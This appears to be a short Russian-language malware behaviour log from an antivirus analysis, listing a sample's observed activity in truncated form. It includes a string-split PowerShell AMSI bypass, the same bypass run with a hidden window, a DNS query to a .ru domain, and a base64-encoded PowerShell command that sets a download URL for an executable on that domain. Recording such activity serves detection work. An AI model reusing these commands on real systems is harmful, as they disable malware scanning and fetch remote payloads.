Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -C $FEIfwuioehfaiwyYOETWTRuwye = 'a'+'ms'+'iI'+'ni'+'tF'+'a'; $EF8034uowieypowiue = 'il'+'ed'; $Ceoiuwjoeuyfw = 'Sy'+'st'+'em.Ma'+'na'+'gem'+'ent.'+'Aut'+'omat'+'io'+'n.A'+'ms'+'iUt'+'ils';$DFi...
- DNS ASK ex####promotions.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -E JABVAFUAVQAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAcABlAHIAdABwAHIAbwBtAG8AdABpAG8AbgBzAC4AcgB1AC8AZgBpAGwAZQBzAC8AcwB2AGMALgBlAHgAZQAnADsAIAAkAFAAUABQACAAPQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AG...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -C $FEIfwuioehfaiwyYOETWTRuwye = 'a'+'ms'+'iI'+'ni'+'tF'+'a'; $EF8034uowieypowiue = 'il'+'ed'; $Ceoiuwjoeuyfw = 'Sy'+'st'+'em.Ma'+'na'+'gem'+'ent.'+'Aut'+'omat'+'io'+'n.A'+'ms'+'iUt'+'ils';$DFi... (со скрытым окном)